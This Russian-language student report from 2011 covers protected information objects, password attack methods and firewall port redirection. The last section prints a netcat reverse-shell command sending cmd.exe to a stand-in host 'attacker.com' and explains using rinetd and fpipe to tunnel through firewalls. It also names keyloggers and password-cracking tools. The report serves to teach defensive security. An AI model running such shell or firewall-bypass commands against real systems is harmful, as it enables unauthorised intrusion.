Охрана компьютерной информации

Размещено на http://www.allbest.ru/

13

МИНСКИЙ ИНСТИТУТ УПРАВЛЕНИЯ

Кафедра автоматизированных информационных систем

Охрана компьютерной информации

Студента группы 71102с

Юшко А.В.

Преподаватель Новиков В.И.

Минск 2011

Содержание

1. Объекты защиты

2. Парольные атаки

3. Перенаправление портов

1. Объекты защиты

Основными объектами защиты информации являются:

· информационные ресурсы, содержащие сведения, отнесенные к государственной тайне, и конфиденциальную информацию;

· средства и системы информатизации (средства вычислительной техники, информационно-вычислительные комплексы, сети и системы), программные средства (операционные системы, системы управления базами данных, другое общесистемное и прикладное программное обеспечение), автоматизированные системы управления, системы связи и передачи данных, технические средства приема, передачи и обработки информации ограниченного доступа (звукозапись, звукоусиление, звукосопровождение, переговорные и телевизионные устройства, средства изготовления, тиражирования документов и другие технические средства обработки графической, смысловой и буквенно-цифровой информации), их информативные физические поля. То есть системы и средства, непосредственно обрабатывающие информацию, отнесенную к государственной тайне, а также конфиденциальную информацию. Эти средства и системы часто называют техническими средствами приема, обработки, хранения и передачи информации (ТСПИ);

Технические средства и системы, не относящиеся к средствам и системам информатизации (ТСПИ), но размещенные в помещениях, в которых обрабатывается секретная и конфиденциальная информация. Такие технические средства и системы называются вспомогательными техническими средствами и системами (ВТСС).

К ним относятся: технические средства открытой телефонной, громкоговорящей связи, системы пожарной и охранной сигнализации, радиотрансляции, часофикации, электробытовые приборы и т.д., а также сами помещения, предназначенные для обработки информации ограниченного распространения.

Информация как объект защиты

Защита конфиденциальной информации и некоторые её аспекты. Основные свойства информации как объекта защиты.

Согласно законодательству РФ, информация - это сведения о лицах, предметах, фактах, событиях, явлениях и процессах, независимо от формы их представления. Защите подлежит внутренняя, конфиденциальная и секретная информация. Внутренняя информация- информация о компании, которая еще не была опубликована (использование внутренней информации, при заключении биржевых сделок, считается незаконным). Информация конфиденциальная - служебная, профессиональная, промышленная, коммерческая или иная информация, правовой режим которой устанавливается ее собственником на основе законов о коммерческой, профессиональной тайне, государственной службе и др. законодательных актов.

Под коммерческой тайной предприятия понимаются не являющиеся государственным секретом сведения, связанные с производством, технологической информацией, управлением, финансами и другой деятельностью предприятия, разглашение (передача, утечка информации) которых может нанести вред его интересам. К секретной информации относится информация, содержащая государственную тайну.

Государственной тайной является информация, несанкционированное распространение которой может нанести ущерб интересам государственных органов, организациям, субъектам и стране в целом.

Информация, как объект познания, имеет следующие характеристики:

· нематериальность, в смысле неизмеримости таких параметров как масса, размеры, энергия известными физическими методами и приборами

· записанная на материальный носитель, информация может храниться, обрабатываться, передаваться по различным каналам связи

· любой материальный объект содержит информацию о себе или о другом объекте

Без информации не может существовать жизнь в любой форме и не могут функционировать созданные человеком любые искусственные системы, без неё сама жизнь и всё созданное человеком представляет собой груду химических/физических элементов. Опыты по изоляции органов чувств человека, затрудняющей его информационный обмен с окружающей средой, показали, что информационный голод (дефицит информации) по своим последствиям не менее разрушителен, чем голод физический.

Защита конфиденциальной информации определяется рядом свойств информации, основные из которых следующие:

1. Информация доступна человеку, если она содержится на материальном носителе. С помощью материальных средств можно защищать только материальный объект, т.о., объектом защиты информации являются материальные носители информации.

2. Носители информации бывают:

o носители - источники информации (чертёж - это источник, а бумага, на которой он нарисован, - носитель, однако, бумага, без нанесённого на ней текста или рисунка является источником информации о её физических и химических характеристиках)

o носители - переносчики информации

o носители - получатели информации

Передача информации путём перемещения её носителей в пространстве связана с затратами энергии, причём величина затрат зависит от длины пути, параметров среды и типа носителя.

3. Ценность информации оценивается степенью полезности её для пользователя (собственника, владельца, получателя). Полезность информации всегда конкретна - нет ценной информации вообще - информация полезна или вредна для конкретного её пользователя, поэтому при защите информации прежде всего определяют круг субъектов (государств, фирм, групп лиц, людей), заинтересованных в защищаемой информации, так как вероятно, что среди них окажутся злоумышленники.В интересах защиты информации её владелец наносит на носитель информации условный знак полезности содержащейся на нём информации - гриф секретности или конфиденциальности. В качестве критерия для определения грифа конфиденциальности информации могут служить результаты прогноза последствий попадания информации к конкуренту или злоумышленнику: величина экономического и морального ущерба, наносимого организации, реальность создания предпосылок для катастрофических последствий в деятельности организации (банкротства и т.п.)

4. Т.к. информация для получателя может быть полезной или вредной, то информацию можно рассматривать как товар.Цена информации, как любого товара, складывается из себестоимости и прибавочной стоимости(прибыли).Себестоимость определяется расходами владельца информации на её получение путём:

o исследований в лабораториях, аналитических центрах, группах и т.п.

o покупке информации

o добыча информации противоправными действиями.

Прибыль от информации может быть получена в результате следующих действий:

o продажи информации на рынке

o материализации информации в продукции с новыми свойствами или в технологиях, приносящими прибыль

o использование информации для принятия эффективных решений (экономия средств, ресурсов и т.п.)

5. Ценность информации изменяется во времени. Распространение информации и её использование приводят к изменению её ценности и цены. Характер изменения ценности от времени зависит от вида информации.

6. Невозможно объективно (без учёта полезности её для потребителя, владельца, собственника) оценить количество информации.

7. Иногда полезность информации связывают с её качеством, но понятие "качество", применительно к информации, не имеет самостоятельного значения, т.к. оно поглощается понятием "количество". Количество информации зависит от её качества: чем более качественная фотография, тем больше оттенков и полутонов она содержит, тем менее на ней помех. Под качеством информации подразумевают качество отображения её на носителе или её достоверность (соответствие оригиналу).

8. При копировании, не изменяющем информационные параметры носителя, количество информации не меняется, а цена снижается.

Все перечисленные свойства информации являются важными составляющими для формирования политики и нформационной безопасности организации, государства, группы лиц - деятельности любых субъектов информационного пространства и информационных систем.

2. Парольные атаки

В современных автоматизированных системах с использованием классической модели разграничения доступа для опознавания (аутентификации) пользователя при предоставлении доступа используется пароль.

Согласно руководящим нормативным документам: пароль (password) - секретная информация аутентификации, представляющая собой последовательность символов, которую пользователь должен ввести посредством устройства ввода информации, прежде чем ему будет предоставлен доступ к компьютерной системе или к информации.

Согласно материалам из Википедии - свободной энциклопедии Всемирной сети: пароль секретная комбинация цифр, знаков, слов, или осмысленное предложение, служащие для опознавания друг другом людей, или для защиты информации от несанкционированного доступа средствами авторизации.

Таким образом, пароль - секретная ключевая информация, владея которой практически любой человек при необходимых технических средствах и знаниях сможет получить доступ к интересующей его системе или информации.

1. Информация, характеризующая параметры доступа к различным финансовым системам: онлайн-банкинга, пластиковые карты, электронные платежные системы, интернет-аукционы, интернет-магазины или аналогичные им онлайновые ресурсы;

2. Информация личного характера:

2.1. Собственно информация личного характера, хранящаяся на компьютере пользователя;

2.2. Пароли для доступа к сайтам или к определенным областям сайтов.

3. Информация доступа к прочим виртуальным ресурсам:

3.1. Параметры доступа к интернету (логины/пароли dial-up- и wifi-доступа, коды интернет-карточек…);

3.2. Пароли к ftp-серверам, p2p-системам, и другим он-лайновым хранилищам;

3.3. Пароли к онлайн-играм (наиболее популярные или требующие оплаты, такие как Lineage, World of Warcraft, Бойцовский клуб и т.д.)

4. Конфиденциальная информация предприятия.

4.1. Собственно конфиденциальная информация предприятия, размещающаяся на информационных ресурсах предприятия;

4.2. Параметры доступа к корпоративным ресурсам (базам данным различных уровней, системам электронного документооборота, биллинговым системам и т.д.);

II. Современные способы атак с целью завладеть паролем (попытка реализации угрозы):

1. Получение пароля при помощи методов социальной инженерии.

1.1. Злоумышленник, используя методы социальной инженерии, пытается побудить пользователя всяческими методами, нажать определенную ссылку в сообщении, либо запустить прикрепленную к сообщению программу, и тем самым заразить систему вредоносными программами.

1.2. Злоумышленник, использующий методы социальной инженерии, не пытается заразить корпоративную систему вредоносными программами в ходе прямой атаки.

2. Получение пароля при помощи технических методов.

2.1. Использование типовых паролей при некорректном конфигурировании автоматизированных систем и оборудования. Сюда же относится использование пустого пароля.

Сравнительно редкий, но возможный вид атаки. Основывается на том, что в автоматизированной системе жертвы имеются пароли, либо внесенные еще при изготовлении, либо оставленные специалистами, устанавливавшими оборудование для сервисного обслуживания.

3. Получение пароля при наличии ошибок в программном обеспечении (ПО).

Сетевой червь - Sasser, появившийся в конце апреля 2004 года, использовал очередную критическую уязвимость в Microsoft Windows и размножался аналогично червю Lovesan -- через глобальную сеть, путем прямого подключения к атакуемому компьютеру.

4. Взлом пароля.

Взломы из-за плохо выбранного или плохо сохраняемого в тайне пароля происходят намного чаще, чем из-за неправильной конфигурации или ошибок в ПО.

4.1.Подбор паролей.

Самый простой метод атаки на удаленную систему, о котором прекрасно осведомлены все потенциальные жертвы. И тем не менее срабатывает он весьма эффективно. В отличие от всех предыдущих методов, этот использует не слабости систем защиты, а слабости людей выбирающих предсказуемый пароль.

4.2. Полный перебор возможных комбинаций.

5. Получение пароля при использовании стандартных средств восстановления пароля.

В этом случае используется предусмотренная сетевым ресурсом возможность восстановления утерянного (забытого) пароля.

6. Взлом при помощи специализированного ПО.

Для восстановления утерянного пароля существует широкий спектр различного ПО, применяемого в зависимости от специфики.

6.1. Восстановление утерянного пароля к файлам-контейнерам.

Для этих целей предлагается большое количество ПО. Например: для подбора паролей к различным архивам, файлам документов существуют продукты семейства Advanced фирмы ElcomSoft, Passware Kit Enterprise.

6.2. Клавиатурные шпионы.

Специальные программные и программно-аппаратные кейлоггеры позволят злоумышленнику получить пароль в чистом виде.

Например: Spy Agent, SC-KeyLog, Ardamax Keylogger, Actual Spy.

6.3. Взлом специализированного ПО.

В связи с большим количеством учетных записей к сетевым ресурсам, файлам-контейнерам, онлайновым ресурсам для хранения паролей доступа к ним предназначено специализированное ПО - менеджеры паролей. Таким образом, необходимо помнить только один пароль на доступ в эту программу. Что естественно не может не привлекать злоумышленников.

6.4.1. В настоящее время практически каждый современный браузер имеет в своем составе менеджер паролей (Internet Explorer 7, Firefox 1.5 и 2.0, Opera). Соответственно существует ПО взлома. Например: AIEPR, PassView, FireMaster и т.д.

6.4.2. Альтернативные менеджеры паролей.

Один из обычных способов хранения паролей пользователей в централизованном приложении. Например: Password Safe известного криптографа Брюса Шнайера.

7. Комбинирование методов.

7.1. Фишинг-- вид интернет-мошенничества, цель которого -- получить идентификационные данные пользователей.

Организаторы фишинг-атак используют массовые рассылки электронных писем от имени популярных брендов. В эти письма они вставляют ссылки на фальшивые сайты, являющиеся точной копией настоящих. С целью побуждения посещения пользователем указанной ссылки они используют методы социальной инженерии.

Парольных атак можно избежать, если не пользоваться паролями в текстовой форме. Одноразовые пароли и/или криптографическая аутентификация могут практически свести на нет угрозу таких атак.

Пользователи должны знать свои обязанности по обеспечению эффективного контроля доступа, особенно если это касается использования паролей и защиты пользовательского оборудования.

3. Пользователи должны следовать установленным процедурам поддержания режима безопасности при выборе и использовании паролей.

а) Назначать индивидуальные пароли для обеспечения подотчетности;

б) Не разглашать используемые пароли;

в) Не записывать пароли на бумаге или в электронном виде, если не представляется возможным ее хранение в защищенном месте;

г) Изменять пароли всякий раз, когда есть указания на возможную компрометацию систем или паролей;

д) Выбирать пароли, содержащие не менее определенного количества символов, рекомендуемых для использования в конкретной системе;

ж) Изменять пароли через регулярные промежутки времени и избегать повторного или "циклического" использования старых паролей;

Практически любое ПО не лишено ошибок, чем может воспользоваться злоумышленник. Соблюдение рекомендаций разработчика конкретной используемой АС и рекомендаций приведенных в данной статье позволит минимизировать возможные потери от парольных атак.

3. Перенаправление портов

Что делать в той ситуации, когда брандмауэр блокирует прямой доступ к целевому компьютеру? Подобную преграду взломщики могут обойти с помощью перенаправления портов (port redirection). Этот вопрос подробно будет изложен в главе 14, однако сейчас мы познакомимся с некоторыми средствами и приемами, которые могут оказаться полезными для хакинга компьютеров под управлением системы NT. Как только взломщики успешно справились с "главным стражем" безопасности -- брандмауэром, -- для передачи всех пакетов "желанной цели" они могут воспользоваться механизмом перенаправления портов. Важно оценить всю опасность подобной деятельности, поскольку в данном случае взломщики могут получить доступ к любому компьютеру, расположенному позади брандмауэра. В процессе перенаправления осуществляется прослушивание определенных портов и передача пакетов к заданной вторичной цели. Ниже будут рассмотрены некоторые приемы перенаправления портов, которые можно вручную осуществить с помощью утилит netcat, rinetd и fpipe. Схема процесса перенаправления портов представлена на рис. 14.4 в главе 14.

Захват командной оболочки м помощью netcat. Если имеется возможность поместить утилиту netcat на целевой компьютер, расположенный позади брандмауэра, то через любой требуемый порт можно получить "в свое распоряжение" удаленную командную оболочку. Такую ситуацию мы называем "захватом оболочки", поскольку в этом случае на рабочем компьютере взломщика сосредоточиваются все функции оболочки удаленной системы. Вот пример команды, запущенной взломщиком из удаленной командной строки. nс attacker.com 80 | cmd.exe | nс attacker.com. Если хакер на своем компьютере attacker.com с помощью утилиты netcat осуществляет прослушивание TCP-портов 80 и 25, и при этом порт 80 разрешает передачу входящих, а порт 25 -- исходящих пакетов на/с компьютера-жертвы через брандмауэр, то эта команда позволяет "захватить" командную оболочку удаленной системы.

Утилита rinetd. Реализация перенаправления портов с помощью трех настроенных вручную сеансов netcat может оказаться далеко не наилучшим способом. Для этого можно воспользоваться различными утилитами, специально предназначенными для перенаправления портов. Эти средства можно найти в Internet. Одной из наиболее мощных утилит является rinetd -- сервер перенаправления Internet Томаса Боутела (Thomas Boutell), который можно найти по адресу http://www.boutell.com/rinetd/index.html. С ее помощью можно перенаправить TCP-соединения с одного IP-адреса и порта на другой. информация атака пароль утилита командная оболочка

Утилита rinetd функционирует подобно datapipe (см. главу 14). Существует также версия, поддерживающая интерфейс Win32 (включая 2000), а также Linux. Утилиту rinetd очень легко использовать: достаточно просто создать конфигурационный файл, содержащий правила передачи пакетов, в следующем формате. адрес_привязки порт_привязки адрес_соединения порт_соединения Затем нужно запустить команду rinetd -с <имя_файла_настройки>. Как и утилита netcat, rinetd функционирует через неправильно настроенный брандмауэр.

Утилита fpipe -- средство передачи/перенаправления исходных пакетов TCP через заданный порт. Она разработана в компании Foundstone, Inc., к которой авторы этой книги имеют непосредственное отношение. Утилита fpipe позволяет создать поток TCP и дополнительно задать требуемый исходный порт. Ее удобно применять для тестового проникновения через брандмауэры, разрешающие прохождение определенных типов пакетов во внутреннюю сеть. Работа утилиты fpipe основана на перенаправлении портов. Запустите ее, задав прослушиваемый порт сервера, порт назначения удаленного узла (порт, которого требуется достичь с внутренней стороны брандмауэра) и (дополнительно) номер требуемого локального исходного порта. После запуска утилита fpipe будет ожидать, пока клиент соединится с прослушиваемым портом. После этого будут установлено новое соединение с целевым компьютером и портом, заданным в качестве локального исходного порта. Таким образом будет активизирован замкнутый контур.

После установки полного соединения утилита fpipe будет передавать все данные, полученные через входящее соединение, на удаленный порт назначения, расположенный позади брандмауэра, и возвращать их обратно системе-инициатору. Это аналогично установке нескольких сеансов netcat, однако утилита fpipe позволяет выполнить ту же задачу абсолютно прозрачно. Рассмотрим использование утилиты fpipe для перенаправления данных из взломанной системы с запущенным сервером telnet, расположенной позади брандмауэра, на котором заблокирован порт 23 (telnet), однако открыт порт 53 (DNS), Как правило, подключиться к TCP-порту, используемому сервером telnet, напрямую нельзя. Однако при использовании утилиты fpipe и переправлении данных в порт TCP 53 эту задачу все же можно выполнить. Простое соединение с портом 53 на этом узле позволяет "захватить" взломщику поток telnet.

Самой примечательной особенностью утилиты fpipe является возможность задать исходный порт. В процессе тестового проникновения это зачастую необходимо для обхода брандмауэра или маршрутизатора, передающего лишь данные, предназначенные определенным портам (например, порту TCP 25, используемому почтовым сервером). Обычно клиентским соединениям TCP/IP назначаются исходные порты с большими номерами, которые брандмауэр, как правило, пропускает через фильтр. Однако тот же брандмауэр должен пропускать данные DNS (фактически, он это и делает). С помощью утилиты fpipe для потока данных можно принудительно задать определенный исходный порт, в данном случае порт DNS. С этого момента этот поток будет рассматриваться брандмауэром как данные "разрешенной" службы и, таким образом, будет пропускаться во внутреннюю сеть.

Пользователи должны знать, что если при задании порта-источника исходящего соединения был использован параметр -в и это соединение было закрыто, может оказаться невозможным установить его повторно (утилита fpipe сообщит, что адрес уже используется) до того момента, пока не истекут интервалы ожидания TIMEJHAIT и CLOSEJHAIT, определяемые протоколом TCP. Эти интервалы ожидания могут варьироваться в диапазоне от 30 секунд до четырех минут и более, в зависимости от используемой операционной системы и ее версии. Эти интервалы ожидания определяются протоколом TCP и не являются ограничением самой утилиты fpipe. Причина возникновения такой ситуации заключается в том, что утилита fpipe пытается установить новое соединение с удаленным узлом с применением тех же комбинаций локальных/удаленных адреса/порта IP, что и в предыдущем сеансе. Новое же соединение не может быть установлено до тех пор, пока стеком протоколов TCP не будет решено, что предыдущее соединение не было полностью завершено.

Размещено на Allbest.ru